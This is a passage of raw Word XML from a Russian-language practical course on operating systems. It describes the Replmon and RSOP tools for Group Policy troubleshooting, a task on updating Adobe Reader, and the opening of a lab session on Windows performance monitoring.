        <w:t xml:space="preserve">Replmon При отладке репликации объектов GPO с одного контроллера домена на другой важно знать, каким из инструментов можно воспользоваться для устранения неполадок. Поскольку репликации подлежат две части объекта GPO, следует рассмотреть репликацию каждой из них. Первая часть – содержимое папки SYSVOL на каждом из контроллеров домена, управляется службой репликации файлов (FRS). Существует не так уж и много способов управления такой репликацией, кроме выключения и включения службы для срабатывания интервала репликации. Другая часть объекта GPO, которая хранится в службе каталогов Active Directory, управляется репликацией Active Directory. Данной репликацией можно управлять между контроллерами домена на том же узле Active Directory с помощью средства Active Directory – сайты и службы. Однако в тех случаях, когда необходимо вызвать репликацию между контроллерами домена на разных узлаъ Active Directory, нужно использовать такую утилиту, как Replmon. Средство Replmon может запускать принудительную репликацию базы данных службы Active Directory за пределы границы сайта, что невозможно сделать при помощи средства Active Directory – сайты и службы. Таким образом в случае несогласованности информации групповых политик, хранимой в Active Directory, можно с помощью Replmon запускать процесс репликации для согласования данной информации на каждом контроллере домена. Утилита Replmon входит в Resource Kit и средства поддержки Windows XP. Ее можно загрузить по адресу </w:t>
      </w:r>
      <w:hyperlink r:id="rId262" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>go.microsoft.com/fwlink/?LinkID=77614</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (на английском языке).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RSOP Подобно утилите командной строки Gpresult, средство RSOP обеспечивает графический интерфейс просмотра параметров, примененных ко всем объектам GPO. Файл</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RSOP.MSC </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>встроен</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows XP Professional </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Server 2003. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Данный инструмент представляет данные о всех примененных параметрах политик в формате, похожем на формат редактора объектов групповой политики, как показано на рис. 5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2068950" cy="2169346"/>
            <wp:effectExtent l="19050" t="0" r="7500" b="0"/>
            <wp:docPr id="272" name="Рисунок 102" descr="Рис. 5 Средство просмотра результирующего набора поли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Рис. 5 Средство просмотра результирующего набора политик"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId263" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2068865" cy="2169257"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рис. 5 Средство просмотра результирующего набора политик</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BEF" w:rsidRPr="00617AC0" w:rsidRDefault="00A12BEF" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00146982" w:rsidRPr="00617AC0" w:rsidRDefault="00146982" w:rsidP="00146982">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidR="00201EB9" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Обновить программу Adobe Reader.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00146982" w:rsidRPr="00617AC0" w:rsidRDefault="00146982" w:rsidP="00146982">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00146982" w:rsidRPr="00617AC0" w:rsidRDefault="00146982" w:rsidP="00146982">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустить программное обеспечение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00146982" w:rsidRPr="00617AC0" w:rsidRDefault="00146982" w:rsidP="00146982">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Во вкладке справка выбрать меню – «Проверить наличие обновлений программного обеспечения»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00146982" w:rsidRPr="00617AC0" w:rsidRDefault="00146982" w:rsidP="00146982">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Принять предложение скачать новую версию ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00146982" w:rsidRPr="00617AC0" w:rsidRDefault="00146982" w:rsidP="00146982">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установить новую версию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B566C" w:rsidRPr="00617AC0" w:rsidRDefault="001B566C" w:rsidP="001B566C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B566C" w:rsidRPr="00617AC0" w:rsidRDefault="001B566C" w:rsidP="001B566C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое обновление программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B566C" w:rsidRPr="00617AC0" w:rsidRDefault="001B566C" w:rsidP="001B566C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие риски несет обновление программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B566C" w:rsidRPr="00617AC0" w:rsidRDefault="001B566C" w:rsidP="001B566C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие риски несет отказ от обновления программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008772E8" w:rsidRPr="00617AC0" w:rsidRDefault="008772E8" w:rsidP="008772E8">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc26278731"/>
      <w:bookmarkStart w:id="131" w:name="_Toc507788263"/>
      <w:bookmarkStart w:id="132" w:name="_Toc507788538"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Практическое занятие № 12 Мониторинг </w:t>
      </w:r>
      <w:r w:rsidR="00672A00" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>производительности</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B6AD5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ОС и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:bookmarkEnd w:id="131"/>
    <w:bookmarkEnd w:id="132"/>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="008772E8" w:rsidP="004B6AD5">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidR="004B6AD5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изучение средств измерения производительности Windows</w:t>
      </w:r>
      <w:r w:rsidR="004B6AD5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с помощью  программы </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="004B6AD5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="004B6AD5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008772E8" w:rsidRPr="00617AC0" w:rsidRDefault="008772E8" w:rsidP="008772E8">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6A4E49" w:rsidRPr="00617AC0" w:rsidRDefault="006A4E49" w:rsidP="006A4E49">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A4E49" w:rsidRPr="00617AC0" w:rsidRDefault="006A4E49" w:rsidP="006A4E49">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="006A4E49" w:rsidP="006A4E49">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 1. Выполнить м</w:t>
      </w:r>
      <w:r w:rsidR="004B6AD5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ониторинг производительности </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">операционной </w:t>
      </w:r>
      <w:r w:rsidR="004B6AD5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">системы с помощью программы </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="004B6AD5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="004B6AD5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Теоретически</w:t>
      </w:r>
      <w:r w:rsidR="006A4E49" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A4E49" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сведения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность вычислительной системы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> рассчитывается как число задач некоторого класса, выполняемых в единицу времени. Класс задач может  определяться самым различным образом: например, поиск в базах данных, просмотр видео, компьютерный дизайн, численное решение систем линейных уравнений, твердотельное моделирование. Показатель производительности обобщ</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>нно характеризует вычислительную систему и используется для сравнения с другими вычислительными системами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В более узком смысле </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>производительность</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> характеризуется степенью загрузки устройств – процессора, оперативной и дисковой памяти, канала локальной сети. Полная загрузка устройств рассматривается как режим работы с максимальной производительностью.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Операционная система </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>содержит средства для визуального или протокольного наблюдения за функционированием компьютера и опера</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t xml:space="preserve">ционной системы. В предыдущих версиях </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">для этой цели использовалась служебная программа </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Системный монитор</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>для этой цели применя</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t xml:space="preserve">ется специальная административная программа </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
